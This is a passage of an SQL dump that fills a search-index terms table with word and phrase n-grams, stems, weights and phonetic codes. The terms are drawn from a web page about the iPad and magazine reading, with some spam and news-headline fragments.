system',0,1,1.3667,'M235',1,'en'),(17043,'main system is','main system is',0,1,1.4667,'M2352',1,'en'),(17044,'major','major',0,0,0.3333,'M260',3,'en'),(17045,'major league','major league',0,1,1.4,'M2642',1,'en'),(17046,'major league baseball\'s','major league baseball',0,1,1.7667,'M264212142',1,'en'),(17047,'makes desktop','make desktop',0,1,1.4333,'M23231',1,'en'),(17048,'makes desktop laptops','make desktop laptops',0,1,1.7,'M2323141312',1,'en'),(17049,'makes desktops','make desktops',0,1,1.4667,'M232312',1,'en'),(17050,'makes desktops apple','make desktops apple',0,1,1.6667,'M23231214',1,'en'),(17051,'man','man',0,0,0.2,'M000',3,'en'),(17052,'man accused','man accused',0,1,1.3667,'M230',1,'en'),(17053,'man accused of','man accused of',0,1,1.4667,'M231',1,'en'),(17054,'man admits','man admits',0,1,1.3333,'M3532',1,'en'),(17055,'man admits raping','man admits raping',0,1,1.5667,'M35326152',1,'en'),(17056,'marketers','market',0,0,0.6,'M62362',2,'en'),(17057,'marketers thinking','market thinking',0,1,1.6,'M6236235252',1,'en'),(17058,'marketers thinking about','market thinking about',0,1,1.8,'M623623525213',1,'en'),(17059,'marketing','market',0,0,0.6,'M62352',4,'en'),(17060,'marketing decline','market decline',0,1,1.5667,'M623523245',1,'en'),(17061,'marketing decline and','market decline and',0,1,1.7,'M6235232453',1,'en'),(17062,'marvel\'s','marvel',0,0,0.5333,'M6142',1,'en'),(17063,'marvel\'s comics','marvel comics',0,1,1.5,'M614252',1,'en'),(17064,'marvel\'s comics app','marvel comics app',0,1,1.6333,'M6142521',1,'en'),(17065,'maximum','maximum',0,0,0.4667,'M250',2,'en'),(17066,'maximum 27','maximum 27',0,1,1.3333,'M250',1,'en'),(17067,'maximum 27 years','maximum 27 years',0,1,1.5333,'M2562',1,'en'),(17068,'may','mai',0,0,0.2,'M000',11,'en'),(17069,'may need','mai need',0,1,1.2667,'M300',1,'en'),(17070,'may need to','mai need to',0,1,1.3667,'M300',1,'en'),(17071,'may the','mai the',0,1,1.2333,'M300',1,'en'),(17072,'may the knees','mai the knees',0,1,1.4333,'M3252',1,'en'),(17073,'may type','mai type',0,1,1.2667,'M310',1,'en'),(17074,'may type standing','mai type standing',0,1,1.5667,'M31235352',1,'en'),(17075,'meager','meager',0,0,0.4,'M260',1,'en'),(17076,'meager two','meager two',0,1,1.3333,'M263',1,'en'),(17077,'meager two not','meager two not',0,1,1.4667,'M26353',1,'en'),(17078,'media','media',0,0,0.3333,'M300',3,'en'),(17079,'media 5.vertical','media 5.vertical',0,1,1.5333,'M316324',1,'en'),(17080,'media 5.vertical branded','media 5.vertical branded',0,1,1.8,'M3163241653',1,'en'),(17081,'messages','messag',0,0,0.5333,'M200',1,'en'),(17082,'messages about','messag about',0,1,1.4667,'M213',1,'en'),(17083,'messages about viruses','messag about viruses',0,1,1.7333,'M213162',1,'en'),(17084,'method','method',0,0,0.4,'M300',1,'en'),(17085,'method it','method it',0,1,1.3,'M300',1,'en'),(17086,'method it was','method it was',0,1,1.4333,'M320',1,'en'),(17087,'mice','mice',0,0,0.2667,'M200',1,'en'),(17088,'mice and','mice and',0,1,1.2667,'M253',1,'en'),(17089,'mice and cursors','mice and cursors',0,1,1.5333,'M25326262',1,'en'),(17090,'might','might',0,0,0.3333,'M230',3,'en'),(17091,'might find','might find',0,1,1.3333,'M23153',1,'en'),(17092,'might find out','might find out',0,1,1.4667,'M23153',1,'en'),(17093,'might learn','might learn',0,1,1.3667,'M23465',1,'en'),(17094,'might learn something','might learn something',0,1,1.7,'M2346525352',1,'en'),(17095,'milagrofilms','milagrofilm',0,0,0.8,'M4261452',2,'en'),(17096,'milagrofilms by','milagrofilm by',0,1,1.5,'M42614521',1,'en'),(17097,'milagrofilms by steve','milagrofilm by steve',0,1,1.7,'M42614521231',1,'en'),(17098,'mobile while','mobil while',0,1,1.4,'M140',1,'en'),(17099,'mobile while you','mobil while you',0,1,1.5333,'M140',1,'en'),(17100,'mode i','mode i',0,1,1.2,'M300',1,'en'),(17101,'mode i should','mode i should',0,1,1.4333,'M3243',1,'en'),(17102,'month\'s','month',0,0,0.4667,'M320',1,'en'),(17103,'month\'s magazine','month magazine',0,1,1.5333,'M32525',1,'en'),(17104,'month\'s magazine ny','month magazine ny',0,1,1.6333,'M32525',1,'en'),(17105,'more efficient','more efficient',0,1,1.4667,'M61253',1,'en'),(17106,'more efficient list','more efficient list',0,1,1.6333,'M61253423',1,'en'),(17107,'more news','more news',0,1,1.3,'M652',1,'en'),(17108,'more news per','more news per',0,1,1.4333,'M65216',1,'en'),(17109,'more tolerable','more tolerable',0,1,1.4667,'M634614',1,'en'),(17110,'more tolerable to','more tolerable to',0,1,1.5667,'M6346143',1,'en'),(17111,'morning','morn',0,0,0.4667,'M652',4,'en'),(17112,'morning to','morn to',0,1,1.3333,'M6523',1,'en'),(17113,'morning to find','morn to find',0,1,1.5,'M6523153',1,'en'),(17114,'most','most',1,0,0.0333,'M230',8,'en'),(17115,'most of','most of',0,1,1.2333,'M231',1,'en'),(17116,'most of the','most of the',0,1,1.3667,'M2313',1,'en'),(17117,'mostly','mostli',0,0,0.4,'M234',3,'en'),(17118,'mostly put','mostli put',0,1,1.3333,'M23413',1,'en'),(17119,'mostly put aside','mostli put aside',0,1,1.5333,'M2341323',1,'en'),(17120,'move','move',0,0,0.2667,'M100',1,'en'),(17121,'move from','move from',0,1,1.3,'M165',1,'en'),(17122,'move from app','move from app',0,1,1.4333,'M1651',1,'en'),(17123,'move that','move that',0,1,1.3,'M130',1,'en'),(17124,'move that is','move that is',0,1,1.4,'M132',1,'en'),(17125,'much','much',0,0,0.2667,'M200',3,'en'),(17126,'much from','much from',0,1,1.3,'M2165',1,'en'),(17127,'much from magazines','much from magazines',0,1,1.6333,'M2165252',1,'en'),(17128,'much taking','much taking',0,1,1.3667,'M23252',1,'en'),(17129,'much taking a','much taking a',0,1,1.4333,'M23252',1,'en'),(17130,'much this','much this',0,1,1.3,'M232',1,'en'),(17131,'much this way','much this way',0,1,1.4333,'M232',1,'en'),(17132,'multi tasking','multi tasking',0,1,1.4333,'M43252',1,'en'),(17133,'multi tasking one','multi tasking one',0,1,1.5667,'M432525',1,'en'),(17134,'multitasking','multitask',0,0,0.8,'M43252',1,'en'),(17135,'multitasking complaints','multitask complaints',0,1,1.7667,'M43252514532',1,'en'),(17136,'multitasking complaints major','multitask complaints major',0,1,1.9667,'M43252514532526',1,'en'),(17137,'music','music',0,0,0.3333,'M200',3,'en'),(17138,'music it','music it',0,1,1.2667,'M230',1,'en'),(17139,'music it would','music it would',0,1,1.4667,'M2343',1,'en'),(17140,'my','my',1,0,0.0167,'M000',5,'en'),(17141,'my actual','my actual',0,1,1.3,'M234',1,'en'),(17142,'my actual have','my actual have',0,1,1.4667,'M2341',1,'en'),(17143,'my thumbs','my thumbs',0,1,1.3,'M3512',1,'en'),(17144,'my thumbs as','my thumbs as',0,1,1.4,'M3512',1,'en'),(17145,'nation','nation',0,0,0.4,'N350',3,'en'),(17146,'nation report','nation report',0,1,1.4333,'N356163',1,'en'),(17147,'nation report findssyracuse','nation report findssyracuse',0,1,1.9,'N356163153262',1,'en'),(17148,'naturally','natur',0,0,0.6,'N364',1,'en'),(17149,'naturally view','natur view',0,1,1.4667,'N3641',1,'en'),(17150,'naturally view full','natur view full',0,1,1.6333,'N36414',1,'en'),(17151,'nearby','nearbi',0,0,0.4,'N610',1,'en'),(17152,'nearby and','nearbi and',0,1,1.3333,'N6153',1,'en'),(17153,'nearby and you','nearbi and you',0,1,1.4667,'N6153',1,'en'),(17154,'nearly','nearli',0,0,0.4,'N640',1,'en'),(17155,'nearly all','nearli all',0,1,1.3333,'N640',1,'en'),(17156,'nearly all multitasking','nearli all multitasking',0,1,1.7667,'N64543252',1,'en'),(17157,'nearly devices','nearli devices',0,1,1.4667,'N64312',1,'en'),(17158,'nearly devices but','nearli devices but',0,1,1.6,'N6431213',1,'en'),(17159,'need to adjust','need to adjust',0,1,1.4667,'N323',1,'en'),(17160,'netbook','netbook',0,0,0.4667,'N312',1,'en'),(17161,'netbook you','netbook you',0,1,1.3667,'N312',1,'en'),(17162,'netbook you may','netbook you may',0,1,1.5,'N3125',1,'en'),(17163,'never','never',0,0,0.3333,'N160',3,'en'),(17164,'never been','never been',0,1,1.3333,'N1615',1,'en'),(17165,'never been afraid','never been afraid',0,1,1.5667,'N1615163',1,'en'),(17166,'new york','new york',0,1,1.2667,'N620',3,'en'),(17167,'new york times','new york times',0,1,1.4667,'N62352',1,'en'),(17168,'news','new',0,0,0.2667,'N200',1,'en'),(17169,'news marketers','new marketers',0,1,1.4667,'N2562362',1,'en'),(17170,'news marketers thinking','new marketers thinking',0,1,1.7667,'N256236235252',1,'en'),(17171,'news per','new per',0,1,1.2667,'N216',1,'en'),(17172,'news per screen','new per screen',0,1,1.5,'N216265',1,'en'),(17173,'news sources','new sources',0,1,1.4,'N262',1,'en'),(17174,'news sources as','new sources as',0,1,1.5,'N262',1,'en'),(17175,'not','not',1,0,0.025,'N300',14,'en'),(17176,'not a','not a',0,1,1.1667,'N300',3,'en'),(17177,'not a full','not a full',0,1,1.3333,'N314',1,'en'),(17178,'not a savior','not a savior',0,1,1.4,'N3216',1,'en'),(17179,'not already','not already',0,1,1.3667,'N3463',1,'en'),(17180,'not already covered','not already covered',0,1,1.6333,'N34632163',1,'en'),(17181,'not even','not even',0,1,1.2667,'N315',1,'en'),(17182,'not even seem','not even seem',0,1,1.4333,'N31525',1,'en'),(17183,'not it\'s','not it',0,1,1.2667,'N320',1,'en'),(17184,'not it\'s easier','not it easier',0,1,1.5,'N326',1,'en'),(17185,'not paste','not paste',0,1,1.3,'N3123',1,'en'),(17186,'not paste into','not paste into',0,1,1.4667,'N312353',1,'en'),(17187,'not so','not so',0,1,1.2,'N320',1,'en'),(17188,'not so active','not so active',0,1,1.4333,'N3231',1,'en'),(17189,'not type','not type',0,1,1.2667,'N310',1,'en'),(17190,'not type much','not type much',0,1,1.4333,'N3152',1,'en'),(17191,'not well','not well',0,1,1.2667,'N340',1,'en'),(17192,'not well suited','not well suited',0,1,1.5,'N3423',1,'en'),(17193,'notice','notic',0,0,0.4,'N320',3,'en'),(17194,'notice the','notic the',0,1,1.3333,'N323',1,'en'),(17195,'notice the lack','notic the lack',0,1,1.5,'N32342',1,'en'),(17196,'noticed','notic',0,0,0.4667,'N323',2,'en'),(17197,'noticed the','notic the',0,1,1.3667,'N323',1,'en'),(17198,'noticed the ipad','notic the ipad',0,1,1.5333,'N32313',1,'en'),(17199,'now','now',0,0,0.2,'N000',10,'en'),(17200,'now they','now they',0,1,1.2667,'N300',1,'en'),(17201,'now they can','now they can',0,1,1.4,'N325',1,'en'),(17202,'npr','npr',0,0,0.2,'N160',1,'en'),(17203,'npr bbc','npr bbc',0,1,1.2333,'N1612',1,'en'),(17204,'npr bbc and','npr bbc and',0,1,1.3667,'N161253',1,'en'),(17205,'npr or','npr or',0,1,1.2,'N160',1,'en'),(17206,'npr or ballgames','npr or ballgames',0,1,1.5333,'N1614252',1,'en'),(17207,'ny','ny',0,0,0.1333,'N000',1,'en'),(17208,'ny teachers\'','ny teachers',0,1,1.4,'N3262',1,'en'),(17209,'ny teachers\' average','ny teachers average',0,1,1.6667,'N3262162',1,'en'),(17210,'obscure','obscur',0,0,0.4667,'O126',1,'en'),(17211,'obscure limitations','obscur limitations',0,1,1.6333,'O12645352',1,'en'),(17212,'obscure limitations why','obscur limitations why',0,1,1.7667,'O12645352',1,'en'),(17213,'of a','of a',0,1,1.1333,'O100',5,'en'),(17214,'of a culture','of a culture',0,1,1.4,'O12436',1,'en'),(17215,'of apple\'s','of apple',0,1,1.3333,'O142',1,'en'),(17216,'of apple\'s iwork','of apple iwork',0,1,1.5333,'O14262',1,'en'),(17217,'of but','of but',0,1,1.2,'O130',1,'en'),(17218,'of but am','of but am',0,1,1.3,'O135',1,'en'),(17219,'of children','of children',0,1,1.3667,'O124365',1,'en'),(17220,'of children who','of children who',0,1,1.5,'O124365',1,'en'),(17221,'of features','of features',0,1,1.3667,'O1362',1,'en'),(17222,'of features handled','of features handled',0,1,1.6333,'O13625343',1,'en'),(17223,'of games','of games',0,1,1.2667,'O1252',1,'en'),(17224,'of games david','of games david',0,1,1.4667,'O1252313',1,'en'),(17225,'of i','of i',0,1,1.1333,'O100',1,'en'),(17226,'of i don\'t','of i don',0,1,1.3333,'O1353',1,'en'),(17227,'of itself','of itself',0,1,1.3,'O13241',1,'en'),(17228,'of itself and','of itself and',0,1,1.4333,'O1324153',1,'en'),(17229,'of multi','of multi',0,1,1.2667,'O1543',1,'en'),(17230,'of multi tasking','of multi tasking',0,1,1.5333,'O1543252',1,'en'),(17231,'of news','of news',0,1,1.2333,'O152',1,'en'),(17232,'of news marketers','of news marketers',0,1,1.5667,'O152562362',1,'en'),(17233,'of of','of of',0,1,1.1667,'O100',1,'en'),(17234,'of of itself','of of itself',0,1,1.4,'O13241',1,'en'),(17235,'of raping','of raping',0,1,1.3,'O16152',1,'en'),(17236,'of raping girls','of raping girls',0,1,1.5,'O16152642',1,'en'),(17237,'of that','of that',0,1,1.2333,'O130',2,'en'),(17238,'of that i\'ll','of that i',0,1,1.4,'O134',1,'en'),(17239,'of the ipad\'s','of the ipad',0,1,1.4333,'O13132',1,'en'),(17240,'of the whiz','of the whiz',0,1,1.3667,'O132',1,'en'),(17241,'of this','of this',0,1,1.2333,'O132',5,'en'),(17242,'of this sweeping','of this sweeping',0,1,1.5333,'O132152',1,'en'),(17243,'of word','of word',0,1,1.2333,'O163',1,'en'),(17244,'of word processing','of word processing',0,1,1.6,'O16316252',1,'en'),(17245,'of worlds','of worlds',0,1,1.3,'O16432',1,'en'),(17246,'of worlds or','of worlds or',0,1,1.4,'O164326',1,'en'),(17247,'off the','off the',0,1,1.2333,'O130',2,'en'),(17248,'off the bat','off the bat',0,1,1.3667,'O1313',1,'en'),(17249,'off the e','off the e',0,1,1.3,'O130',1,'en'),(17250,'old','old',1,0,0.025,'O430',7,'en'),(17251,'old media','old media',0,1,1.3,'O4353',1,'en'),(17252,'old media 5.vertical','old media 5.vertical',0,1,1.6667,'O435316324',1,'en'),(17253,'on a laptop','on a laptop',0,1,1.3667,'O54131',1,'en'),(17254,'on a netbook','on a netbook',0,1,1.4,'O5312',1,'en'),(17255,'on a table','on a table',0,1,1.3333,'O5314',1,'en'),(17256,'on an','on an',0,1,1.1667,'O500',2,'en'),(17257,'on an iphone','on an iphone',0,1,1.4,'O515',1,'en'),(17258,'on and','on and',0,1,1.2,'O530',3,'en'),(17259,'on and that\'s','on and that',0,1,1.4333,'O532',1,'en'),(17260,'on iphone','on iphone',0,1,1.3,'O515',1,'en'),(17261,'on iphone apps','on iphone apps',0,1,1.4667,'O51512',1,'en'),(17262,'on that','on that',0,1,1.2333,'O530',1,'en'),(17263,'on that while','on that while',0,1,1.4333,'O534',1,'en'),(17264,'on the coffee','on the coffee',0,1,1.4333,'O5321',1,'en'),(17265,'on the cost','on the cost',0,1,1.3667,'O5323',1,'en'),(17266,'on the ipad','on the ipad',0,1,1.3667,'O5313',1,'en'),(17267,'on the safari','on the safari',0,1,1.4333,'O53216',1,'en'),(17268,'one','on',0,0,0.2,'O500',10,'en'),(17269,'one thing','on thing',0,1,1.3,'O5352',1,'en'),(17270,'one thing i','on thing i',0,1,1.3667,'O5352',1,'en'),(17271,'one way','on way',0,1,1.2333,'O500',1,'en'),(17272,'one way you','on way you',0,1,1.3667,'O500',1,'en'),(17273,'only over','onli over',0,1,1.3,'O5416',1,'en'),(17274,'only over the','onli over the',0,1,1.4333,'O54163',1,'en'),(17275,'open an','open an',0,1,1.2333,'O150',1,'en'),(17276,'open an e','open an e',0,1,1.3,'O150',1,'en'),(17277,'or ballgames','or ballgames',0,1,1.4,'O614252',1,'en'),(17278,'or ballgames mobile','or ballgames mobile',0,1,1.6333,'O614252514',1,'en'),(17279,'or buy','or buy',0,1,1.2,'O610',1,'en'),(17280,'or buy bestsellers','or buy bestsellers',0,1,1.6,'O61232462',1,'en'),(17281,'or google','or google',0,1,1.3,'O624',1,'en'),(17282,'or google documents','or google documents',0,1,1.6333,'O62432532',1,'en'),(17283,'or the','or the',0,1,1.2,'O630',3,'en'),(17284,'or the changer','or the changer',0,1,1.4667,'O632526',1,'en'),(17285,'or the other','or the other',0,1,1.4,'O636',1,'en'),(17286,'os','os',0,0,0.1333,'O200',1,'en'),(17287,'os because','os because',0,1,1.3333,'O212',1,'en'),(17288,'os because some','os because some',0,1,1.5,'O2125',1,'en'),(17289,'other app','other app',0,1,1.3,'O361',1,'en'),(17290,'other app other','other app other',0,1,1.5,'O36136',1,'en'),(17291,'other might','other might',0,1,1.3667,'O36523',1,'en'),(17292,'other might learn','other might learn',0,1,1.5667,'O36523465',1,'en'),(17293,'other way','other way',0,1,1.3,'O360',1,'en'),(17294,'other way round','other way round',0,1,1.5,'O3653',1,'en'),(17295,'out','out',1,0,0.025,'O300',11,'en'),(17296,'out a','out a',0,1,1.1667,'O300',2,'en'),(17297,'out a way','out a way',0,1,1.3,'O300',1,'en'),(17298,'out month\'s','out month',0,1,1.3667,'O3532',1,'en'),(17299,'out month\'s magazine','out month magazine',0,1,1.6667,'O3532525',1,'en'),(17300,'out why','out why',0,1,1.2333,'O300',1,'en'),(17301,'out why a','out why a',0,1,1.3,'O300',1,'en'),(17302,'outlook','outlook',0,0,0.4667,'O342',1,'en'),(17303,'outlook web','outlook web',0,1,1.3667,'O3421',1,'en'),(17304,'outlook web access','outlook web access',0,1,1.6,'O34212',1,'en'),(17305,'outside','outsid',0,0,0.4667,'O323',1,'en'),(17306,'outside magazine','outsid magazine',0,1,1.5333,'O323525',1,'en'),(17307,'outside magazine had','outsid magazine had',0,1,1.6667,'O3235253',1,'en'),(17308,'outstanding','outstand',0,0,0.7333,'O3235352',1,'en'),(17309,'outstanding with','outstand with',0,1,1.5333,'O32353523',1,'en'),(17310,'outstanding with stories','outstand with stories',0,1,1.8,'O323535232362',1,'en'),(17311,'over','over',1,0,0.0333,'O160',10,'en'),(17312,'over the','over the',0,1,1.2667,'O163',4,'en'),(17313,'over the following','over the following',0,1,1.6,'O1631452',1,'en'),(17314,'over the screen','over the screen',0,1,1.5,'O163265',1,'en'),(17315,'over whether','over whether',0,1,1.4,'O1636',1,'en'),(17316,'over whether the','over whether the',0,1,1.5333,'O16363',1,'en'),(17317,'own','own',0,0,0.2,'O500',4,'en'),(17318,'own beloved','own beloved',0,1,1.3667,'O51413',1,'en'),(17319,'own beloved position','own beloved position',0,1,1.6667,'O514131235',1,'en'),(17320,'own silly','own silly',0,1,1.3,'O524',1,'en'),(17321,'own silly face','own silly face',0,1,1.4667,'O52412',1,'en'),(17322,'pads','pad',0,0,0.2667,'P320',1,'en'),(17323,'pads and','pad and',0,1,1.2667,'P3253',1,'en'),(17324,'pads and touch','pad and touch',0,1,1.4667,'P32532',1,'en'),(17325,'pages 10','page 10',0,1,1.2667,'P200',1,'en'),(17326,'pages and','page and',0,1,1.3,'P253',1,'en'),(17327,'pages and posts','page and posts',0,1,1.5,'P2531232',1,'en'),(17328,'pages is','page is',0,1,1.2667,'P200',1,'en'),(17329,'pages is a','page is a',0,1,1.3333,'P200',1,'en'),(17330,'pages labeled','page labeled',0,1,1.4333,'P24143',1,'en'),(17331,'pages labeled editors\'','page labeled editors',0,1,1.7333,'P2414362',1,'en'),(17332,'pages that','page that',0,1,1.3333,'P230',1,'en'),(17333,'pages that did','page that did',0,1,1.4667,'P230',1,'en'),(17334,'pages that scroll','page that scroll',0,1,1.5667,'P23264',1,'en'),(17335,'pandora','pandora',0,0,0.4667,'P536',5,'en'),(17336,'pandora bracelets','pandora bracelets',0,1,1.5667,'P536162432',5,'en'),(17337,'pandora bracelets canada','pandora bracelets canada',0,1,1.8,'P53616243253',2,'en'),(17338,'pandora npr','pandora npr',0,1,1.3667,'P536516',1,'en'),(17339,'pandora npr or','pandora npr or',0,1,1.4667,'P536516',1,'en'),(17340,'part of a','part of a',0,1,1.3,'P631',2,'en'),(17341,'particular','particular',0,0,0.6667,'P63246',5,'en'),(17342,'particular take','particular take',0,1,1.5,'P6324632',1,'en'),(17343,'particular take on','particular take on',0,1,1.6,'P63246325',1,'en'),(17344,'paste','past',0,0,0.3333,'P230',1,'en'),(17345,'paste into','past into',0,1,1.3333,'P2353',1,'en'),(17346,'paste into an','past into an',0,1,1.4333,'P23535',1,'en'),(17347,'paste method','past method',0,1,1.4,'P2353',1,'en'),(17348,'paste method it','past method it',0,1,1.5,'P2353',1,'en'),(17349,'patrol','patrol',0,0,0.4,'P364',1,'en'),(17350,'patrol carsyracuse','patrol carsyracuse',0,1,1.6,'P36426262',1,'en'),(17351,'patrol carsyracuse man','patrol carsyracuse man',0,1,1.7333,'P364262625',1,'en'),(17352,'pay','pai',0,0,0.2,'P000',4,'en'),(17353,'pay for','pai for',0,1,1.2333,'P600',1,'en'),(17354,'pay for there','pai for there',0,1,1.4333,'P636',1,'en'),(17355,'pay pandora','pai pandora',0,1,1.3667,'P536',1,'en'),(17356,'pay pandora bracelets','pai pandora bracelets',0,1,1.7,'P536162432',1,'en'),(17357,'pc','pc',0,0,0.1333,'P200',2,'en'),(17358,'pc among','pc among',0,1,1.2667,'P252',1,'en'),(17359,'pc among the','pc among the',0,1,1.4,'P2523',1,'en'),(17360,'pc you','pc you',0,1,1.2,'P200',1,'en'),(17361,'pc you might','pc you might',0,1,1.4,'P2523',1,'en'),(17362,'per','per',0,0,0.2,'P600',8,'en'),(17363,'per screen','per screen',0,1,1.3333,'P6265',1,'en'),(17364,'per screen ibooks','per screen ibooks',0,1,1.5667,'P626512',1,'en'),(17365,'personal','person',0,0,0.5333,'P6254',3,'en'),(17366,'personal computers','person computers',0,1,1.6,'P6254251362',1,'en'),(17367,'personal computers and','person computers and',0,1,1.7333,'P625425136253',1,'en'),(17368,'phone on','phone on',0,1,1.2667,'P500',1,'en'),(17369,'phone on the','phone on the',0,1,1.4,'P530',1,'en'),(17370,'photos','photo',0,0,0.4,'P320',2,'en'),(17371,'photos but','photo but',0,1,1.3333,'P3213',1,'en'),(17372,'photos but its','photo but its',0,1,1.4667,'P32132',1,'en'),(17373,'physical','physic',0,0,0.5333,'P240',1,'en'),(17374,'physical keyboard','physic keyboard',0,1,1.5667,'P242163',1,'en'),(17375,'physical keyboard on','physic keyboard on',0,1,1.6667,'P2421635',1,'en'),(17376,'pick','pick',0,0,0.2667,'P200',4,'en'),(17377,'pick up','pick up',0,1,1.2333,'P210',1,'en'),(17378,'pick up the','pick up the',0,1,1.3667,'P213',1,'en'),(17379,'piece','piec',0,0,0.3333,'P200',1,'en'),(17380,'piece of','piec of',0,1,1.2667,'P210',1,'en'),(17381,'piece of apple\'s','piec of apple',0,1,1.5333,'P2142',1,'en'),(17382,'pleased','pleas',0,0,0.4667,'P423',1,'en'),(17383,'pleased in','pleas in',0,1,1.3333,'P4235',1,'en'),(17384,'pleased in spite','pleas in spite',0,1,1.5333,'P4235213',1,'en'),(17385,'pogue','pogu',0,0,0.3333,'P200',1,'en'),(17386,'pogue did','pogu did',0,1,1.3,'P230',1,'en'),(17387,'pogue did the','pogu did the',0,1,1.4333,'P230',1,'en'),(17388,'pooh','pooh',0,0,0.2667,'P000',1,'en'),(17389,'pooh to','pooh to',0,1,1.2333,'P300',1,'en'),(17390,'pooh to show','pooh to show',0,1,1.4,'P320',1,'en'),(17391,'popular','popular',0,0,0.4667,'P460',3,'en'),(17392,'popular science','popular science',0,1,1.5,'P46252',1,'en'),(17393,'popular science made','popular science made',0,1,1.6667,'P4625253',1,'en'),(17394,'position','posit',0,0,0.5333,'P235',2,'en'),(17395,'position demonstrated','posit demonstrated',0,1,1.7,'P235352363',1,'en'),(17396,'position demonstrated milagrofilms','posit demonstrated milagrofilms',0,1,2,'P23535236354261452',1,'en'),(17397,'position it','posit it',0,1,1.3667,'P2353',1,'en'),(17398,'position it may','posit it may',0,1,1.5,'P23535',1,'en'),(17399,'possess','possess',0,0,0.4667,'P200',1,'en'),(17400,'possess abnormally','possess abnormally',0,1,1.6,'P215654',1,'en'),(17401,'possess abnormally long','possess abnormally long',0,1,1.7667,'P21565452',1,'en'),(17402,'possibly','possibl',0,0,0.5333,'P214',1,'en'),(17403,'possibly do','possibl do',0,1,1.3667,'P2143',1,'en'),(17404,'possibly do on','possibl do on',0,1,1.4667,'P21435',1,'en'),(17405,'posts','post',0,0,0.3333,'P232',1,'en'),(17406,'posts didn\'t','post didn',0,1,1.4,'P232353',1,'en'),(17407,'posts didn\'t zoom','post didn zoom',0,1,1.5667,'P23235325',1,'en'),(17408,'potential','potenti',0,0,0.6,'P3534',2,'en'),(17409,'potential you','potenti you',0,1,1.4333,'P3534',1,'en'),(17410,'potential you can','potenti you can',0,1,1.5667,'P353425',1,'en'),(17411,'pre','pre',0,0,0.2,'P600',1,'en'),(17412,'pre installed','pre installed',0,1,1.4333,'P652343',1,'en'),(17413,'pre installed with','pre installed with',0,1,1.6,'P652343',1,'en'),(17414,'presented','present',0,0,0.6,'P6253',2,'en'),(17415,'presented like','present like',0,1,1.4667,'P625342',1,'en'),(17416,'presented like clippings','present like clippings',0,1,1.8,'P6253424152',1,'en'),(17417,'print','print',0,0,0.3333,'P653',2,'en'),(17418,'print pages','print pages',0,1,1.3667,'P65312',1,'en'),(17419,'print pages that','print pages that',0,1,1.5333,'P653123',1,'en'),(17420,'prints','print',0,0,0.4,'P6532',2,'en'),(17421,'prints stare','print stare',0,1,1.4,'P653236',1,'en'),(17422,'prints stare and','print stare and',0,1,1.5333,'P65323653',1,'en'),(17423,'prison','prison',0,0,0.4,'P625',1,'en'),(17424,'processing you','process you',0,1,1.4667,'P6252',1,'en'),(17425,'processing you can','process you can',0,1,1.6,'P62525',1,'en'),(17426,'program it\'s','program it',0,1,1.4,'P626532',1,'en'),(17427,'program it\'s that','program it that',0,1,1.5667,'P6265323',1,'en'),(17428,'prospective','prospect',0,0,0.7333,'P621231',1,'en'),(17429,'prospective buyers','prospect buyers',0,1,1.6,'P62123162',1,'en'),(17430,'prospective buyers that','prospect buyers that',0,1,1.7667,'P621231623',1,'en'),(17431,'prospects','prospect',0,0,0.6,'P621232',2,'en'),(17432,'prospects publishers','prospect publishers',0,1,1.6667,'P62123214262',1,'en'),(17433,'prospects publishers will','prospect publishers will',0,1,1.8333,'P621232142624',1,'en'),(17434,'publishers','publish',0,0,0.6667,'P4262',1,'en'),(17435,'publishers before','publish before',0,1,1.5667,'P426216',1,'en'),(17436,'publishers before the','publish before the',0,1,1.7,'P4262163',1,'en'),(17437,'publishers will','publish will',0,1,1.5,'P42624',1,'en'),(17438,'publishers will have','publish will have',0,1,1.6667,'P426241',1,'en'),(17439,'put','put',0,0,0.2,'P300',7,'en'),(17440,'put aside','put aside',0,1,1.3,'P323',1,'en'),(17441,'put aside the','put aside the',0,1,1.4333,'P323',1,'en'),(17442,'put their','put their',0,1,1.3,'P360',1,'en'),(17443,'put their feet','put their feet',0,1,1.4667,'P3613',1,'en'),(17444,'quickly','quickli',0,0,0.4667,'Q400',3,'en'),(17445,'quickly you','quickli you',0,1,1.3667,'Q400',1,'en'),(17446,'quickly you almost','quickli you almost',0,1,1.6,'Q4523',1,'en'),(17447,'raping','rape',0,0,0.4,'R152',1,'en'),(17448,'raping girls','rape girls',0,1,1.4,'R152642',1,'en'),(17449,'raping girls 2','rape girls 2',0,1,1.4667,'R152642',1,'en'),(17450,'raping little','rape little',0,1,1.4333,'R152434',1,'en'),(17451,'raping little girls','rape little girls',0,1,1.6333,'R1524342642',1,'en'),(17452,'rather','rather',0,0,0.4,'R360',2,'en'),(17453,'rather have','rather have',0,1,1.3667,'R361',1,'en'),(17454,'rather have a','rather have a',0,1,1.4333,'R361',1,'en'),(17455,'read','read',0,0,0.2667,'R300',1,'en'),(17456,'read the','read the',0,1,1.2667,'R300',1,'en'),(17457,'read the text','read the text',0,1,1.4333,'R323',1,'en'),(17458,'reader','reader',0,0,0.4,'R360',1,'en'),(17459,'reader potential','reader potential',0,1,1.5333,'R3613534',1,'en'),(17460,'reader potential you','reader potential you',0,1,1.6667,'R3613534',1,'en'),(17461,'reading','read',0,0,0.4667,'R352',2,'en'),(17462,'reading suffer','read suffer',0,1,1.4667,'R35216',1,'en'),(17463,'reading suffer is','read suffer is',0,1,1.5667,'R352162',1,'en'),(17464,'really','realli',0,0,0.4,'R400',5,'en'),(17465,'really is','realli is',0,1,1.3,'R420',1,'en'),(17466,'really is instant','realli is instant',0,1,1.5667,'R4252353',1,'en'),(17467,'refuses','refus',0,0,0.4667,'R120',1,'en'),(17468,'refuses to','refus to',0,1,1.3333,'R123',1,'en'),(17469,'refuses to come','refus to come',0,1,1.5,'R12325',1,'en'),(17470,'remotely','remot',0,0,0.5333,'R534',1,'en'),(17471,'remotely a','remot a',0,1,1.3333,'R534',1,'en'),(17472,'remotely a good','remot a good',0,1,1.5,'R53423',1,'en'),(17473,'report findssyracuse','report findssyracuse',0,1,1.6667,'R163153262',1,'en'),(17474,'report findssyracuse man','report findssyracuse man',0,1,1.8,'R1631532625',1,'en'),(17475,'reproduced','reproduc',0,0,0.6667,'R16323',2,'en'),(17476,'reproduced in','reproduc in',0,1,1.4333,'R163235',1,'en'),(17477,'reproduced in the','reproduc in the',0,1,1.5667,'R1632353',1,'en'),(17478,'resting','rest',0,0,0.4667,'R2352',1,'en'),(17479,'resting you\'ll','rest you',0,1,1.4667,'R23524',1,'en'),(17480,'resting you\'ll find','rest you find',0,1,1.6333,'R23524153',1,'en'),(17481,'reuters had','reuter had',0,1,1.3667,'R3623',1,'en'),(17482,'reuters had harsh','reuter had 